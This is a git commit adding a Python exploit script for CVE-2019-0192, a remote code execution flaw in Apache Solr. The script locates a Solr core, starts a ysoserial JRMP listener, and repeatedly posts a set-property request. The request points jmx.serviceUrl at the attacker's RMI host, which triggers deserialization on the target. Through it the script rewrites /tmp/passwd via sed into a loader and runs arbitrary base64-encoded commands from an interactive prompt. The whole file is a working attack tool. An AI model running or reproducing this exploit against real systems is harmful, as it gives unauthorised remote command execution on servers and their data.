add CVE-2019-0192

3lackrush · 3lackrush · commit ab205951db47 · 2019-03-11T16:25:54.000+08:00
diff --git a/CVE-2019-0192/CVE-2019-0192.py b/CVE-2019-0192/CVE-2019-0192.py
@@ -0,0 +1,174 @@
+import base64
+import requests
+import subprocess
+import signal
+import sys
+import os
+import time
+import re
+
+remote = "http://172.18.0.5:8983"
+ressource = ""
+RHOST = "172.18.0.1"
+RPORT = "1099"
+
+proxy = {
+}
+
+def exploit(command):
+    print("\n Run the malicious RMI server using yoserial by running this command:")
+    print("\n java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21" + command)
+    
+
+if __name__ == "__main__":
+    print("\nCVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5\n")
+    print("[+] Checking if ressource available =>", end=' ')
+
+    burp0_url = remote + "/solr/admin/cores?wt=json"
+    r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False)
+    if r.status_code == 200:
+        if r.json()['status'] == "":
+            print("KO")
+            sys.exit()
+        else:
+            a = list(r.json()['status'].keys())
+            ressource = "/solr/" + a[0] + "/config"
+            print(ressource)
+    else:
+        print("KO")
+        sys.exit()
+
+    while True:
+        try:
+            command = input("command (\033[92mnot reflected\033[0m)> ")
+            if command == "exit":
+                print("Exiting...")
+                break
+            command = base64.b64encode(command.encode('utf-8'))
+            command_str = command.decode('utf-8')
+            command_str = command_str.replace('/', '+')
+
+            pro = subprocess.Popen(
+                "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'cp /etc/passwd /tmp/passwd'", stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)
+
+            print("[+] Copy file to tmp directory =>", end=' ')
+            burp0_url = remote + ressource
+            burp0_headers = {"Content-Type": "application/json"}
+            burp0_json = {
+                "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
+            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
+            if r.status_code == 500:
+                m = re.search('(undeclared checked exception; nested exception is)', r.text)
+                if m:
+                    print("\033[92mOK\033[0m")
+                else:
+                    print("\n[-] Error")
+                    os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                    sys.exit()
+            else:
+                print("KO")
+                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                sys.exit()
+            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+            time.sleep(3)
+
+            pro = subprocess.Popen(
+                "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1cpwn /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
+
+            print("[+] Preparing file =>", end=' ')
+            burp0_url = remote + ressource
+            burp0_headers = {"Content-Type": "application/json"}
+            burp0_json = {
+                "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
+            r = requests.post(
+                burp0_url, headers=burp0_headers, json=burp0_json)
+            if r.status_code == 500:
+                print("\033[92mOK\033[0m")
+            else:
+                print("KO")
+                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                sys.exit()
+            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+            time.sleep(3)
+
+            pro = subprocess.Popen(
+                "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i /[^pwn]/d /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
+
+            print("[+] Cleaning temp file =>", end=' ')
+            burp0_url = remote + ressource
+            burp0_headers = {"Content-Type": "application/json"}
+            burp0_json = {
+                "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
+            r = requests.post(
+                burp0_url, headers=burp0_headers, json=burp0_json)
+            if r.status_code == 500:
+                print("\033[92mOK\033[0m")
+            else:
+                print("KO")
+                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                sys.exit()
+            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+            time.sleep(3)
+
+            pro = subprocess.Popen(
+                "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1s/pwn/{echo," +
+                command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
+
+            print("[+] Writing command into temp file =>", end=' ')
+            burp0_url = remote + ressource
+            burp0_headers = {"Content-Type": "application/json"}
+            burp0_json = {
+                "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
+            r = requests.post(
+                burp0_url, headers=burp0_headers, json=burp0_json)
+            if r.status_code == 500:
+                print("\033[92mOK\033[0m")
+            else:
+                print("KO")
+                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                sys.exit()
+            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+            time.sleep(3)
+
+            pro = subprocess.Popen(
+                "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
+
+            print("[+] Decode base64 command =>", end=' ')
+            burp0_url = remote + ressource
+            burp0_headers = {"Content-Type": "application/json"}
+            burp0_json = {
+                "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
+            r = requests.post(
+                burp0_url, headers=burp0_headers, json=burp0_json)
+            if r.status_code == 500:
+                print("\033[92mOK\033[0m")
+            else:
+                print("KO")
+                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                sys.exit()
+            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+            time.sleep(3)
+
+            pro = subprocess.Popen(
+                "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash pwn.txt'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
+
+            print("[+] Executing command =>", end=' ')
+            burp0_url = remote + ressource
+            burp0_headers = {"Content-Type": "application/json"}
+            burp0_json = {
+                "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
+            r = requests.post(
+                burp0_url, headers=burp0_headers, json=burp0_json)
+            if r.status_code == 500:
+                print("\033[92mOK\033[0m")
+            else:
+                print("KO")
+                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+                sys.exit()
+            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
+            time.sleep(3)
+
+        except KeyboardInterrupt:
+            print("Exiting...")
+            break
+
